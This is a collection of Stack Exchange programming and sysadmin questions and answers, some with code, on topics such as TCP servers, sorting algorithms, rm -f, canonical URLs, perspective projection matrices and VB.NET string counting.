dataFromClient); try { var isoPassbookRequestMessage = System.Text.Encoding.ASCII.GetString(bytesFrom); 
WebClient wc = new WebClient(); NameValueCollection input = new NameValueCollection(); input.Add(isoPassbookRequest, Convert.ToBase64String(bytesFrom)); respose = Encoding.ASCII.GetString(wc.UploadValues(http://localhost:52835/Transaction/PassbookTransactionRequest, input)); try { // CommonMethods.AddtoLogFile(PassbookTransactionResponse = Clientid- + clientID + ProcessingCode -930000 Message - + respose); // atmServer.Send(clientID, Encoding.ASCII.GetBytes(respose)); } catch (SocketException se) { //could not complete transaction //Send reversal to CBS } } catch (Exception e) { } rCount = Convert.ToString(requestCount); serverResponse = Server to clinet( + clNo + ) + rCount; sendBytes = Encoding.ASCII.GetBytes(respose); networkStream.Write(sendBytes, 0, sendBytes.Length); networkStream.Flush(); Console.WriteLine( >> + serverResponse); } catch (Exception ex) { Console.WriteLine( >> + ex.ToString()); } } } } | TCP Server with multithreading | c#;multithreading;asynchronous;socket;tcp | null |
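For contrast, the thread-per-connection pattern this C# code builds by hand is available ready-made in several standard libraries. Here is the equivalent shape in Python's `socketserver`: `ThreadingTCPServer` spawns one handler thread per client, and because each connection gets its own handler instance, per-client state like the request counter needs no shared mutable fields. This is a sketch of the pattern, not of the ISO 8583 protocol itself:

```python
import socket
import socketserver
import threading

class AckHandler(socketserver.BaseRequestHandler):
    """Each connection runs handle() in its own thread."""
    def handle(self):
        while True:
            data = self.request.recv(4096)
            if not data:              # client closed the connection
                break
            self.request.sendall(b"ACK:" + data)

# Port 0 asks the OS for an ephemeral port; server_address reports the real one.
server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), AckHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

# One client round-trip against the running server.
with socket.create_connection(server.server_address) as conn:
    conn.sendall(b"hello")
    reply = b""
    while len(reply) < len(b"ACK:hello"):   # TCP may deliver in pieces
        reply += conn.recv(4096)

server.shutdown()
server.server_close()
```

The same division of labor would address the review questions here: the framework owns accept-and-dispatch, and the handler owns exactly one client's state.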
_codereview.59867 | I'm working on a simple dictionary tool, with a base class that can be extended by plugins to represent different dictionaries. The base class does most of the heavy lifting: it keeps the index of all entries in memory, and it handles searching the index. Plugins that extend this class implement populating the index and loading the entries on demand, handling the specifics of the dictionary backend, such as the formatting of entries.These are the base classes:import abcfrom collections import defaultdictclass BaseEntry(object): def __init__(self, entry_id, name): self.entry_id = entry_id self.name = name @property def content(self): return { 'id': self.entry_id, 'name': self.name, 'content': [], 'references': [], } def __repr__(self): return '%s: %s' % (self.entry_id, self.name)class BaseDictionary(object): @abc.abstractproperty def name(self): return '<The Dictionary>' @abc.abstractproperty def is_public(self): return False @property def license(self): return None def __init__(self): self.items_sorted = {} self.items_by_name = defaultdict(list) self.items_by_id = {} self.load_index() def find(self, word, find_similar=False): matches = self.items_by_name.get(word) if matches: return matches if find_similar: return self.find_by_prefix(word, find_similar=True) return [] def find_by_prefix(self, prefix, find_similar=False): matches = [] for k in self.items_sorted: if k.startswith(prefix): matches.extend(self.items_by_name[k]) elif matches: break if find_similar and not matches and len(prefix) > 1: return self.find_by_prefix(prefix[:-1], find_similar=True) return matches def find_by_suffix(self, suffix): matches = [] for k in self.items_sorted: if k.endswith(suffix): matches.extend(self.items_by_name[k]) return matches def find_by_partial(self, partial): matches = [] for k in self.items_sorted: if partial in k: matches.extend(self.items_by_name[k]) return matches def get_entry(self, entry_id): entry = self.items_by_id.get(entry_id) if entry: return 
[entry] else: return [] def add(self, entry): self.items_by_name[entry.name].append(entry) self.items_by_id[entry.entry_id] = entry def reindex(self): self.items_sorted = sorted(self.items_by_name) @abc.abstractmethod def load_index(self): Populate the index. Implement like this: for entry in entries: self.add(entry) self.reindex() :return: passThis is an example plugin implementation:import osimport refrom settings import dictionary_pathfrom dictionary.base import BaseDictionary, BaseEntry, lazy_propertyINDEX_PATH = os.path.join(dictionary_path, 'index.dat')re_strong_defs = re.compile(r'(Defn:|Syn\.)')re_strong_numdots = re.compile(r'(\d+\. )')re_strong_alphadots = re.compile(r'(\([a-z]\))')re_em_roundbr = re.compile(r'(\([A-Z][a-z]+\.\))')re_em_squarebr = re.compile(r'(\[[A-Z][a-z]+\.\])')def load_entry_content(word, filename): path = os.path.join(dictionary_path, filename) if not os.path.isfile(path): return with open(path) as fh: count = 0 content = [] definition_list = [] for line in fh: # first line contains the term, and ignore next 2 lines if count < 3: if count == 0: word = line.strip().lower() count += 1 continue line = line.strip() line = line.replace('*', '') line = re_strong_defs.sub(r'**\1**', line) line = re_strong_numdots.sub(r'**\1** ', line) line = re_strong_alphadots.sub(r'**\1**', line) line = re_em_roundbr.sub(r'*\1*', line) line = re_em_squarebr.sub(r'*\1*', line) if line: content.append(line) else: definition_list.append(['', ' '.join(content)]) content = [] return { 'id': filename, 'name': word, 'content': definition_list, 'references': [] } class Dictionary(BaseDictionary): @property def name(self): return 'Webster\'s Unabridged Dictionary' @property def is_public(self): return True @property def license(self): return The content of this dictionary is for the use of anyone anywhere at no cost and with almost no restrictions whatsoever. 
You may copy it, give it away or re-use it under the terms of the Project Gutenberg License included online at www.gutenberg.net def load_index(self): with open(INDEX_PATH) as fh: for line in fh: (entry_id, name) = line.strip().split(':') entry = Entry(entry_id, name) self.add(entry) self.reindex() def get_entry(self, entry_id): entries = super(Dictionary, self).get_entry(entry_id) if not entries: entry = Entry(entry_id, '') if entry.content: entry.name = entry.content['name'] self.add(entry) return [entry] return entriesclass Entry(BaseEntry): @lazy_property def content(self): return load_entry_content(self.name, self.entry_id)An example dictionary file looks like this:chairChair, n. Etym: [OE. chaiere, chaere, OF. chaiere, chaere, F. chaire]1. A movable single seat with a back.2. An official seat, as of a chief magistrate or a judge, but esp.that of a professor; hence, the office itself.The chair of a philosophical school. Whewell.A chair of philology. M. Arnold.3. The presiding officer of an assembly; a chairman; as, to addressthe chair.4. A vehicle for one person; either a sedan borne upon poles, or two-wheeled carriage, drawn by one horse; a gig. Shak.Think what an equipage thou hast in air, And view with scorn twopages and a chair. Pope.5. An iron blok used on railways to support the rails and secure themto the sleepers. Chair days, days of repose and age.-- To put into the chair, to elect as president, or as chairman of ameeting. Macaulay.-- To take the chair, to assume the position of president, or ofchairman of a meeting.I'm looking for a general review:Is this code Pythonic?Is this is good object oriented design? Would you design the class structure differently?Other things you'd do differently? (Apart from using a database to handle the indexing of entries, a feature I plan to add soon.)The open-source project is here. 
| A simple dictionary tool, extensible with plugins | python;object oriented | A quick review of the base classes.There's no documentation. What does this code do? How am I supposed use it? What is the interface? When I subclass one of your base classes, what are my responsibilities? What properties and methods do I need to implement and what must they return?The interface seems inconvenient. If you want to know an entry's id, then it looks like you have to write:entry.content['id']which seems unnecessarily verbose compared to something like entry.id.In BaseEntry.content you construct a new dictionary each time the method is called. This seems wasteful since the dictionary is always the same.Good practice for __repr__ methods is to output something that will evaluate to an equivalent object. So I'd write:def __repr__(self): return '{0.__name__}({1.id}, {1.name})'.format(type(self), self)When you have an interface that needs to read the contents of a file, it's best practice to design the interface so that you can pass either a file name or a file object.The reason for this is that if an interface only accepts a file name, then you can only pass it data via the local file system, and that when the data comes from a network connection, or from a test case in Python source code, or is constructed in memory, then you have to save that data out to a temporary file. It is much more convenient to construct and pass a file object in these cases.(See for example the standard library functions tarfile.open, lzma.open, plistlib.readPlist.)Why are BaseDictionary.name and BaseDictionary.is_public abstract properties? Why do you require subclasses to override these properties?What is the purpose of the is_public property? It doesn't seem to be used. |
_codereview.77792 | How to optimize this merge sort code to make it run faster? And how to call merge_sort function without user input by declaring necessary array in the code?

#include <iostream>
using namespace std;

int a[50];

void merge(int,int,int);

void merge_sort(int low,int high)
{
    int mid;
    if(low<high)
    {
        mid = low + (high-low)/2; //This avoids overflow when low, high are too large
        merge_sort(low,mid);
        merge_sort(mid+1,high);
        merge(low,mid,high);
    }
}

void merge(int low,int mid,int high)
{
    int h,i,j,b[50],k;
    h=low;
    i=low;
    j=mid+1;
    while((h<=mid)&&(j<=high))
    {
        if(a[h]<=a[j])
        {
            b[i]=a[h];
            h++;
        }
        else
        {
            b[i]=a[j];
            j++;
        }
        i++;
    }
    if(h>mid)
    {
        for(k=j;k<=high;k++)
        {
            b[i]=a[k];
            i++;
        }
    }
    else
    {
        for(k=h;k<=mid;k++)
        {
            b[i]=a[k];
            i++;
        }
    }
    for(k=low;k<=high;k++)
        a[k]=b[k];
}

int main()
{
    int num,i;
    cout<<"MERGE SORT PROGRAM"<<endl;
    cout<<endl<<endl;
    cout<<"Please Enter THE NUMBER OF ELEMENTS you want to sort [THEN PRESS ENTER]: "<<endl;
    cin>>num;
    cout<<endl;
    cout<<"Now, Please Enter the ( "<< num <<" ) numbers (ELEMENTS) [THEN PRESS ENTER]:"<<endl;
    for(i=1;i<=num;i++)
    {
        cin>>a[i];
    }
    merge_sort(1,num);
    cout<<endl;
    cout<<"So, the sorted list (using MERGE SORT) will be :"<<endl;
    cout<<endl<<endl;
    for(i=1;i<=num;i++)
        cout<<a[i]<<" ";
    cout<<endl<<endl<<endl<<endl;
    return 1;
} | Merge sort optimization and improvement | c++;optimization;algorithm;mergesort | null
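On the second part of the question (calling the sort without user input): the same merge logic driven from an array declared in code can be sketched as follows (a Python sketch for brevity, mirroring the question's overflow-safe midpoint; not a drop-in replacement for the C++ above):

```python
def merge_sort(v, lo, hi):
    # Recursively sort v[lo..hi] in place, bottoming out on single elements.
    if lo >= hi:
        return
    mid = lo + (hi - lo) // 2   # same overflow-safe midpoint as the question
    merge_sort(v, lo, mid)
    merge_sort(v, mid + 1, hi)
    merged = []
    i, j = lo, mid + 1
    while i <= mid and j <= hi:
        if v[i] <= v[j]:
            merged.append(v[i]); i += 1
        else:
            merged.append(v[j]); j += 1
    merged.extend(v[i:mid + 1])   # one of these two tails is empty
    merged.extend(v[j:hi + 1])
    v[lo:hi + 1] = merged

a = [9, 4, 7, 1, 8, 2]          # declared in code, no cin needed
merge_sort(a, 0, len(a) - 1)
print(a)                         # [1, 2, 4, 7, 8, 9]
```

The C++ equivalent would simply initialise `a` with a brace list and skip the `cin` loop.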
_webapps.41474 | I have a Google Spreadsheet that has 6 or 7 columns that are all related. I would like to group them all under one header, to show this relation. Each column would additionally have its own additional header (C1, C2, C3...) For example,

==========================================
              Group Name                 |
==========================================
 C1 | C2 | C3 | C4 | C5 | C6 | C7 |
==========================================
    |    |    |    |    |    |    |
    |    |    |    |    |    |    |
    |    |    |    |    |    |    |
    |    |    |    |    |    |    |
    |    |    |    |    |    |    |
    |    |    |    |    |    |    |

Is there a way to do this? | Grouping Columns in Google Spreadsheets | google spreadsheets | null
_softwareengineering.164353 | What's the difference between overloading a method and overriding it in Java?Is there a difference in method signature, access specifier, return type, etc.? | What's the difference between overloading a method and overriding it in Java? | java;object oriented | null |
_webmaster.23404 | I'm working on a site that has a search facility with multiple parameters that look up property listings. The possible parameters are:City, Area, Building Type, Min. Bedrooms, Max Rental Price, Page Number, Sort Order.The 'raw' url, without any rewriting would look something like this:www.mysite.com/city=1&area=1&type=1&bedrooms=3&price=1000&page=3&sort=1While you're using my site, it doesn't matter to me or to you what the URL looks like, so I think I'm happy to work with the so called 'dirty' URL.It matters however, what Googlebot sees, so i'm planning to add a URL rewrite to allow access to pages like:www.mysite.com/london/kensington/apartmentsAnd then i'm planning to add canonicals to make sure that's the page that gets indexed - no matter what your bedroom / price preferences are, what page of results you're on or the order in which you want them to appear. The idea is that Google will only index fewer, higher quality 'view-all' pages, but users will be able to drill down and refine their results to get very specific.The question however is whether or not this is a correct use of the canonical and whether it will lead to the desired effect?EDITIt doesn't matter if google indexes 'dirty' URLs with parameters (though it should index the clean one when theres one available). What really matters is that the site gets found when people conduct a relevant search. Having it above competitor sites is the idea, if they didn't have an SEO strategy. | Having google index canonicals but users using parameters - correct? | seo;google search;url rewriting;canonical url | Canonical URLs are to be used when two different URLs can be used to pull up the same content. 
If your URL rewriting causes this to happen then canonical URLs will be necessary.

So if:

www.mysite.com/london/kensington/apartments

pulls up the same content as

www.mysite.com/city=london&area=kensington&type=apartments

then you need canonical URLs. (That second example may not make sense but hopefully you get the idea).

UPDATE

If the only difference between two pages is the sort order of a metric or something similar you will need to use canonical URLs for those pages.
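For reference, the canonical hint the answer talks about is declared with a link element in the head of each variant page, pointing at the one URL that should be indexed (the URL below is the question's own example):

```html
<link rel="canonical" href="http://www.mysite.com/london/kensington/apartments" />
```

Google treats this as a strong hint that the parameterised variants are duplicates of that page and should consolidate indexing signals onto it.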
_unix.88943 | By reading the GNU coreutils man page for rm, one of the options is -f, which according to the manual,

-f, --force ignore nonexistent files and arguments, never prompt

Now, I made some tests and saw that indeed if I use something like

rm -f /nonexisting/directory/

it won't complain. What can someone really gain from such an option? Plus the most common examples of deleting directories using rm is something like

rm -rf /delete/this/dir

The -r option makes sense, but -f? | What's the real point of the -f option on rm? | rm;options;coreutils | I find that the man page lacks a little detail in this case. The -f option of rm actually has quite a few use cases:

To avoid an error exit code
To avoid being prompted
To bypass permission checks

You are right that it's pointless to remove a non-existent file, but in scripts it's really convenient to be able to say "I don't want these files, delete them if you find them, but don't bother me if they don't exist". Some people use set -e in their script so that it will stop on any error (to avoid any further damage the script can cause), and rm -rf /home/my/garbage is easier than if [[ -f /home/my/garbage ]]; then rm -r /home/my/garbage; fi.

A note about permission checks: to delete a file, you need write permission to the parent directory, not the file itself. So let's say somehow there is a file owned by root in your home directory and you don't have sudo access, you can still remove the file using the -f option. If you use Git you can see that Git doesn't leave the write permission on the object files that it creates:

-r--r--r-- 1 phunehehe phunehehe 62 Aug 31 15:08 testdir/.git/objects/7e/70e8a2a874283163c63d61900b8ba173e5a83c

So if you use rm, the only way to delete a Git repository without using root is to use rm -rf.
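The permission point is easy to demonstrate on a POSIX system. The sketch below runs the unlink call directly (the interactive prompt for read-only files is behaviour of the rm tool itself, which -f suppresses) and shows that a read-only file can still be deleted because the parent directory is writable:

```python
import os
import stat
import tempfile

# POSIX semantics: deleting a file needs write permission on the PARENT
# DIRECTORY, not on the file itself.
d = tempfile.mkdtemp()
path = os.path.join(d, "object")
with open(path, "w") as fh:
    fh.write("data")
os.chmod(path, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)  # r--r--r--, like a Git object

os.remove(path)              # succeeds: the directory itself is writable
print(os.path.exists(path))  # False
os.rmdir(d)
```

This is exactly why `rm -rf` can wipe a Git repository without any chmod step: the object files are read-only, but their directories are not.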
_webapps.70199 | What is the correct syntax for the URL (see also a related question about documentation) to view a Google Visualization API Query result as a web page containing the tabulated results of the query? "Directly" in the question subject line implies these constraints:

From the URL only, and,
Not requiring separate special web pages that read that Javascript output and reformulate it, and,
Not requiring manual cut and paste operations, and
Not requiring a bridge through a Google document that has to be created (since I want just a direct URL to render the page),

My failed attempt: My query is of the form (key value CENSORED):

http://spreadsheets.google.com/a/google.com/tq?key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something'

Browsing to that page dumps out the result as one long Javascript call containing JSON encoded info. Useful for programmers I bet, but not for direct viewing of a query result just by browsing to the query URL. Tacking on a &output=html:

http://spreadsheets.google.com/a/google.com/tq?key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something'&output=html

Does not change the output. Obviously output=html is not recognized or is ignored (guessing the syntax from Google Spreadsheets URL Syntax and Display Options?). This should be documented but I could not find it (hence another related question) | How to directly view a Google Visualization API Query URL as a human-readable table or web page? | google spreadsheets | Try this (the addition for html output, bolded in the original answer, is the tqx=out:html parameter):

http://spreadsheets.google.com/a/google.com/tq?tqx=out:html&tq=key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something'

or the way google usually rearranges it:

http://docs.google.com/spreadsheets/d/CENSORED/tq?tqx=out:html&tq=key=CENSORED&tq=SELECT%20*%20WHERE%20lower(C)%20CONTAINS%20'something'
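If you need to build such URLs programmatically, a small sketch (the CENSORED key placeholder is kept from the question; this builds the documented tqx/tq parameter pair rather than repeating the doubled tq from the pasted URLs):

```python
from urllib.parse import urlencode

# Sketch: assemble a Visualization API query URL that renders as an HTML table.
base = "https://docs.google.com/spreadsheets/d/CENSORED/tq"
params = {
    "tqx": "out:html",  # ask the Visualization API for an HTML table
    "tq": "SELECT * WHERE lower(C) CONTAINS 'something'",
}
url = base + "?" + urlencode(params, safe=":*'")
print(url)
```

Other documented `tqx` output formats include `out:csv` and `out:json`, so the same construction covers exports too.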
_codereview.121899 | I'm trying to make my QuickSort faster than it is and I have got no more ideas about how to make it more efficient for all types of arrays but mostly very big arrays. It uses random to create the Pivot and it uses InsertionSort when the array is less than 15 elements. What do you think guys? I appreciate any help here to make the code run faster.

import java.util.Random;

public class QuickSort {
    private static Random rand = new Random();

    public void sort(int[] v){
        QuickSort(v, 0, v.length-1);
    }

    private void QuickSort (int[] v, int first, int last) {
        if (first >= last)
            return;
        else {
            if (last - first < 15) {
                InsertionSort(v, first, last);
                return;
            }
            int[] pivotLoc = partitionArray(v, first, last, makePivot(v,first,last));
            QuickSort(v, first, pivotLoc[1]);
            QuickSort(v, pivotLoc[0], last);
        }
    }

    private int[] partitionArray (int[] v, int first, int last, int pivot) {
        while(last >= first) {
            while(v[first] < pivot)
                first++;
            while(v[last] > pivot)
                last--;
            if (first > last)
                break;
            swap(v, first, last);
            first++;
            last--;
        }
        return new int[] {first, last};
    }

    private void swap(int[] v, int first, int last) {
        int temp = v[first];
        v[first] = v[last];
        v[last] = temp;
    }

    public void InsertionSort(int[] v, int first, int last) {
        int temp;
        for (int i=first + 1; i <= last; i++) {
            int j = i;
            while (j > 0 && v[j-1] > (v[j]) ) {
                temp = v[j];
                v[j] = v[j-1];
                v[j-1] = temp;
                j--;
            }
        }
    }

    private int makePivot (int[] v, int first, int last){
        return v[rand.nextInt(last-first+1)+first];
    }
} | Faster QuickSort | java;sorting;quick sort;insertion sort | null
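For comparison, the hybrid scheme the question describes (random pivot plus an insertion-sort cutoff of 15) looks like this in outline (a Python sketch for illustration, not a tuned implementation):

```python
import random

CUTOFF = 15  # matches the question's threshold for switching to insertion sort

def insertion_sort(v, lo, hi):
    # Sort the small slice v[lo..hi] in place.
    for i in range(lo + 1, hi + 1):
        j = i
        while j > lo and v[j - 1] > v[j]:
            v[j - 1], v[j] = v[j], v[j - 1]
            j -= 1

def quicksort(v, lo=0, hi=None):
    if hi is None:
        hi = len(v) - 1
    if hi - lo < CUTOFF:
        insertion_sort(v, lo, hi)   # small ranges: cheaper than recursing
        return
    pivot = v[random.randint(lo, hi)]  # random pivot, as in the question
    i, j = lo, hi
    while i <= j:
        while v[i] < pivot: i += 1
        while v[j] > pivot: j -= 1
        if i <= j:
            v[i], v[j] = v[j], v[i]
            i += 1; j -= 1
    quicksort(v, lo, j)
    quicksort(v, i, hi)

data = random.sample(range(1000), 200)
quicksort(data)
print(data == sorted(data))  # True
```

The usual next refinements are median-of-three pivot selection and recursing on the smaller partition first to bound stack depth.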
_cstheory.12833 | The problem statement isGiven convex functions $f_i$ over $X$, find $$\arg\max_{x\in X} \sum_i f_i(x)$$Does this kind of problem structure allow one to use specific strategies to solve the problem?Does it help if I also know the lower bound and upper bound of each $\max_x f_i(x)$ and the corresponding $x$?For example, is there any algorithm like the objective function analogy of branch and bound method ? | Maximizing a convex function where the objective function is separable but the search space is not | ds.algorithms;approximation algorithms;optimization;convex optimization;approximation | null |
_unix.75734 | I have a bunch of web sites that I develop, and I run an Apache server locally to do debugging and design. The web sites use Apache, PHP, and MySQL. To be clear, my Apache server is not serving these sites to the internet, I just access them locally.I develop on two machines. One desktop, and one laptop. Both are running Linux Mint, and I try to keep the settings consistent between them. This means I have to duplicate the Apache and PHP configurations. I keep the directory structures the same. I have to make sure to copy the MySQL databases from one machine to the other if I make changes.Which is not ideal. It's prone to human error, especially with keeping the MySQL databases synched. Sometimes I work on one on one machine, forget to export and import the databases, and then after I've done work on the other machine, I have two versions and I can't easily merge them. Also, it's a hassle for making backups.What does work is that I store all my HTML, CSS, and Javascript in a folder in my Dropbox directory. So any changes I make to those files are automatically syncronized. It also means I have a backup in the cloud. Should the need arise, to restore these files if I ever move to a new machine, I just have to install Dropbox and all the files are recovered.The most I have to do if setting up on a new computer is create a symlink to my Dropbox directory where my HTML files are stored:sudo ln -s /home/dave/Dropbox/Websites /var/www/WebsitesIs there a way I can do this with my Apache settings and MySQL databases as well? Where I can keep them synchronized across both machines in my Dropbox folder, and have a miminum of set up if I go to a new machine? | Is it not possible to store my local websites in my Dropbox folder? | apache httpd;mysql;dropbox | null |
_unix.371421 | I have a question, how do I move my /dev/mapper/datos-datos_lv so I can use that space on /? I want to use the space from /dev/mapper/datos on the `/` filesystem.

df -h
Filesystem         Size  Used Avail Use% Mounted on
/dev/sda1           92G  5.8G   82G   7% /
devtmpfs           1.9G     0  1.9G   0% /dev
tmpfs              1.9G  140K  1.9G   1% /dev/shm
tmpfs              1.9G   41M  1.9G   3% /run
tmpfs              1.9G     0  1.9G   0% /sys/fs/cgroup
/dev/mapper/datos  296GB  63M  281G   1% /opt
tmpfs              379M   28K  379M   1% /run/user/1000

What I want to achieve is:

df -h
Filesystem         Size  Used Avail Use% Mounted on
/dev/sda1          388G  5.8G   82G   7% /
devtmpfs           1.9G     0  1.9G   0% /dev
tmpfs              1.9G  140K  1.9G   1% /dev/shm
tmpfs              1.9G   41M  1.9G   3% /run
tmpfs              1.9G     0  1.9G   0% /sys/fs/cgroup
tmpfs              379M   28K  379M   1% /run/user/1000

Is there any way to get 388G on /? | Merge two partitions | linux;filesystems;partition;lvm | null
_cs.23541 | In an article I am currently reading, the grammar

S → SS | a | ε

is being described as canonical infinitely ambiguous. The infinitely ambiguous part I have no problem recognizing, but what does canonical mean? Does it mean typical, standard example etc.? | Canonical infinitely ambiguous languages | formal languages;terminology | I think your understanding of the use of canonical here as standard example is correct; similarly, grammars for parenthesis matching or palindromes are canonical examples for context-free grammars, generally.
_computerscience.4662 | So I've been messing with perspective projection matrices recently. I used numpy and GTK/Cairo to make a very small Python renderer. I'm very confused with the results I'm getting though.I took this Homogeneous Coordinates technique from an online lecture. If I understood correctly, the objective is to transform every point inside a Viewing Pyramid that's frustum shaped so they fit in a cube. (Image from of songho.ca) You need a Field of View angle ($\alpha$), the Near and Far plane distances ($n$ and $f$ respectively), and the aspect ratio ($r$). Firstly you turn every 3D Point into a Homogeneous Point by adding a 1 like so:\begin{align*}\begin{pmatrix} x & y & z\end{pmatrix}\xrightarrow{\text{4D}}\begin{bmatrix} x & y & z & 1\end{bmatrix}\end{align*}Then you multiply your point matrix by a perspective projection matrix:\begin{align*}\begin{bmatrix}x & y &z & 1 \end{bmatrix}\begin{bmatrix} 1\over\tan(\alpha/2) & 0 & 0 & 0\\ 0 & r\over\tan(\alpha/2) & 0 & 0\\ 0 & 0 & (f+n)\over(f-n) & -1 \\ 0 & 0 & (2nf)\over(f-n) & 0\end{bmatrix}=\begin{bmatrix}x' & y' & z' & w\end{bmatrix}\end{align*}And to go back to a 3D point in space you divide by the fourth dimension:\begin{align*}\begin{bmatrix} x' & y' & z' & w\end{bmatrix}\xrightarrow{\text{3D}}\begin{pmatrix} x' \over w & y' \over w & z' \over w\end{pmatrix}\end{align*}This is exactly what I've done with numpy:def projection_matrix(fov, aspect, near, far): t = 1/math.tan(math.radians(fov)/2) a = (far + near)/(far - near) b = (2*near*far)/(far-near) r = aspect return numpy.matrix([[t, 0, 0, 0], [0, r*t, 0, 0], [0, 0, a, -1], [0, 0, b, 0]])But for some reason the renderer is totally messed up. This is supposed to be a spinning cube... What am I missing here? | My perspective projection is messed up? 
| rendering;projections;camera matrix | The math for the projection matrix is (with fov as $\alpha$):

$q \leftarrow \frac{1}{\tan(\frac{\alpha}{2})}$

$a \leftarrow \frac{q}{aspect}$

$b \leftarrow \frac{(far + near)}{(near - far)}$

$c \leftarrow \frac{(2 * far * near)}{(near - far)}$

Notice that there are some things you're doing differently, such as the order of your subtractions between near and far, how you organize the matrix values, and your multiplication between your r * t.

Using the variables above, the column-major matrix below would be the resulting perspective projection matrix:

\begin{bmatrix} a & 0 & 0 & 0 \\ 0 & q & 0 & 0 \\ 0 & 0 & b & c \\ 0 & 0 & -1 & 0\end{bmatrix}

From the above, we get:

def perspective_projection_matrix(fov, aspect, near, far):
    q = 1 / tan(radians(fov * 0.5))
    a = q / aspect
    b = (far + near) / (near - far)
    c = (2*near*far) / (near - far)
    # construct column-major matrix here...

NOTE: I left the last part out because I'm not familiar enough with numpy to know whether it expects row-major or column-major order. Also, you should validate all your arguments (e.g. both near > 0 and far > 0, far > near, etc.) if you want to avoid future headaches.
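A quick numeric sanity check of those formulas (assuming the matrix multiplies a column vector [x, y, z, 1]^T and a right-handed view space looking down -z; the answer leaves these conventions open): the near plane should map to z = -1 and the far plane to z = +1 after the divide by w.

```python
import math

def perspective(fov_deg, aspect, near, far):
    # Rows of the matrix from the answer, listed top to bottom.
    q = 1.0 / math.tan(math.radians(fov_deg) / 2.0)
    a = q / aspect
    b = (far + near) / (near - far)
    c = (2.0 * far * near) / (near - far)
    return [[a, 0, 0, 0],
            [0, q, 0, 0],
            [0, 0, b, c],
            [0, 0, -1, 0]]

def project(m, x, y, z):
    # Multiply [x, y, z, 1]^T by the matrix, then divide by w.
    v = [m[r][0]*x + m[r][1]*y + m[r][2]*z + m[r][3] for r in range(4)]
    w = v[3]
    return [v[0]/w, v[1]/w, v[2]/w]

m = perspective(90.0, 1.0, 1.0, 10.0)
print(project(m, 0.0, 0.0, -1.0))   # z component is approximately -1 at the near plane
print(project(m, 0.0, 0.0, -10.0))  # z component is approximately +1 at the far plane
```

If the spinning cube still comes out mangled with these values, the remaining suspects are the row/column-major convention expected by the rendering code and the order of the matrix multiply.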
_unix.296941 | In my user, which has admin privileges, I have several languages enabled, and English (U.S.) is the 'Primary' language:After updating to El Capitan (10.11), I get mixed languages in bash:$ svn upUpdating '.': [English]P revisjon 3096. [Norwegian]$ lkbash: lk: [Russian]$Each message is reliably the same language every time. Command not found is always in Russian, On revision #### is always in Norwegian, etc. I know these languages, so this isn't impacting my productivity, but what the dad gum is going on?!$ localeLANG=LC_COLLATE=CLC_CTYPE=UTF-8LC_MESSAGES=CLC_MONETARY=CLC_NUMERIC=CLC_TIME=CLC_ALL= | Mixed languages in bash after OS X update to El Capitan | bash;locale | null |
_unix.388275 | I would like to disable password login for a user. But instead of the error message (Public key) I would not like the user notice that the password login is disabled and prompting him for password.So far I know I can disable password login for all users except one withPasswordAuthentication noMatch User totoPasswordAuthentication yesBut attempting to login as 'not_toto' will result an error message from the server, which I do not wish.Do I need to modify openssh sources to do that? Or is there a configuration option which can do the job?Edit:Having two ssh servers running is an option, so killing connections with iptables or via another method (outside ssh configuration) could do it.Edit 2:I want to do this as I need two ssh instances, one in the official door to get in and the other is a honeypot. So the bots will give their password but never letting them in. (nb: this is a personal project I am the only one using the server and not logging colleagues passwords nor other nasty things, I just want to make some stats on bots)The first ssh server (say official) is OpenSSH_7.4p1 Debian-10+deb9u1, OpenSSL 1.0.2l 25 May 2017, installed with Debian packages.The 'honeypot' is a modified version of Openssh-7.4p1 that logs username and passwords from login attempts.Actually PAM should be enabled on this one but I will double check it. Maybe your option symcbean may be the right one. | SSH: disable password login for root but leaving the prompt | ssh;openssh | null |
_codereview.78966 | Following is the code I am using to find a separate count for alphabets and numeric characters in a given alphanumeric string: Public Sub alphaNumeric(ByVal input As String) 'alphaNumeric(asd23fdg4556g67gh678zxc3xxx) 'input.Count(Char.IsLetterOrDigit) Dim alphaCount As Integer = 0 '<-- initialize alphabet counter Dim numericCount As Integer = 0 '<-- initialize numeric counter For Each c As Char In input '<-- iterate through each character in the input If IsNumeric(c) = True Then numericCount += 1 '<--- check whether c is numeric? if then increment nunericCounter If Char.IsLetter(c) = True Then alphaCount += 1 '<--- check whether c is letter? if then increment alphaCount Next MsgBox(Number of alphabets : & alphaCount) '<-- display the result MsgBox(Number of numerics : & numericCount) End SubEverything works fine for me. Let me know how I can make this simpler. | Get alpha numeric count from a string | strings;vb.net | In general your code looks good, here are a few smaller remarks.Method name:Capitalize the name of your method and make it more meaningful. Use CountAlphaNumeric or something similar.Comments in code:You can omit the comments in your code. It speaks for itself what the code is doing, certainly because you use clear names for your variables.IsNumeric() - Char.IsDigit():In the .NET framework, there's the Char.IsDigit method, use this one instead:If Char.IsDigit(c) = True Then numericCount += 1MsgBox() - MessageBox.Show():Although MsgBox is valid, it also comes from the VB era. 
In the .NET framework there's the MessageBox.Show method, use that one instead:

MessageBox.Show("Number of alphabets : " & alphaCount)

String.Format():

To insert variables in a string, use String.Format instead of just concatenating the values:

Dim result As String = String.Format("Number of alphabets : {0}", alphaCount)

Expression = True:

You can leave out the = True part in your if conditions, since the methods return a boolean value.

This is what the code now looks like:

Public Sub CountAlphaNumeric(ByVal input As String)
    Dim alphaCount As Integer = 0
    Dim numericCount As Integer = 0
    For Each c As Char In input
        If Char.IsDigit(c) Then numericCount += 1
        If Char.IsLetter(c) Then alphaCount += 1
    Next
    MessageBox.Show(String.Format("Number of alphabets : {0}", alphaCount))
    MessageBox.Show(String.Format("Number of numerics : {0}", numericCount))
End Sub

Using LinQ:

Although not always the best option, you can achieve the same result using LinQ, using the Enumerable.Count method:

Dim alphaCount = input.Count(Function(c) Char.IsLetter(c))
Dim numericCount = input.Count(Function(c) Char.IsDigit(c))

Here's the complete code using LinQ:

Public Sub CountAlphaNumericUsingLinQ(ByVal input As String)
    Dim alphaCount = input.Count(Function(c) Char.IsLetter(c))
    Dim numericCount = input.Count(Function(c) Char.IsDigit(c))
    MessageBox.Show(String.Format("Number of alphabets : {0}", alphaCount))
    MessageBox.Show(String.Format("Number of numerics : {0}", numericCount))
End Sub
